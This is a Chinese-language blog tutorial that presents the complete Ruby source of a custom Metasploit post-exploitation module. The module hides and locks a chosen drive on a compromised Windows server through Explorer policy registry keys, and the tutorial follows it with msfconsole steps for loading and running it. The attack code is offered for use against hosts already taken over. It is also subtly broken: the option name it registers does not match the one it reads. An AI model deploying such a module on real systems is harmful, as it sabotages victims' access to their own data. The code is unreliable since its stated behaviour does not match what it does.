# Metasploit自定义让磁盘失效的后渗透模块
一个可以禁用Windows 操作系统上的指定硬盘的程序,这里我们将脚本命名为:disable_drives_by_binghe.rb。
具体内容如下:
##
# Author 冰河
# Date 2019-01-12
# Description 禁用Windows操作系统上的指定硬盘的程序
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
def initialize
super(
'Name' => 'Driver Disabler',
'Description' => 'This Modules Hides and Restrict Access to a Drive',
'Author' => 'binghe',
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('DriverName', [true, 'Please SET the Drive Letter'])
], self.class)
end
def run
drive_int = drive_string(datastore['DriveName'])
key1 = "HKLM\\SoftWare\\Microsoft\\WIndows\\CurrentVersion\\Policies\\Explorer"
exists = meterpreter_registry_key_exist?(key1)
if not exists
print_good("Hidden Drive")
meterpreter_registry_setvaldata(key1, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
print_good("Restricting Access to the Drive")
meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', drive_int.to_s, 'REG_DWORD',REGISTRY_VIEW_NATIVE)
else
print_good("Key Exist, Skipping and Creating Values")
print_good("Hiding Drive")
meterpreter_registry_setvaldata(key1, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_NATIVE)
print_good("Restricting Access to the Drive")
meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', drive_int.to_s, 'REG_DWORD',REGISTRY_VIEW_NATIVE)
end
print_good("Disabled #{datastore['DriveName']} Drive")
end
def drive_string(drive)
case drive
when 'A'
return 1
when 'B'
return 2
when 'C'
return 4
when 'D'
return 8
when 'E'
return 16
end
end
end
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
注意:使用此脚本的前提是我们已经经过一系列的渗透拿到了目标Windows服务器的System权限。
接下来我们将脚本传到Kali的/usr/share/metasploit-framework/modules/post/windows/manage目录下,此时,我们在Kali下操作:
msfconsole
msf auxiliary(scanner/ssh/ssh_brute_by_binghe) > use post/windows/manage/disable_drives_by_binghe
msf post(windows/manage/disable_drives_by_binghe) > show options
Module options (post/windows/manage/disable_drives_by_binghe):
Name Current Setting Required Description
---- --------------- -------- -----------
DriverName yes Please SET the Drive Letter
SESSION yes The session to run this module on.
msf post(windows/manage/disable_drives_by_binghe) > set DriverName D
DriverName => D
msf post(windows/manage/disable_drives_by_binghe) > run
1
2
3
4
5
6
7
8
9
10
11
12
13
14
2
3
4
5
6
7
8
9
10
11
12
13
14
此时,查看目标服务器的D盘确实被成功禁用了。
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!
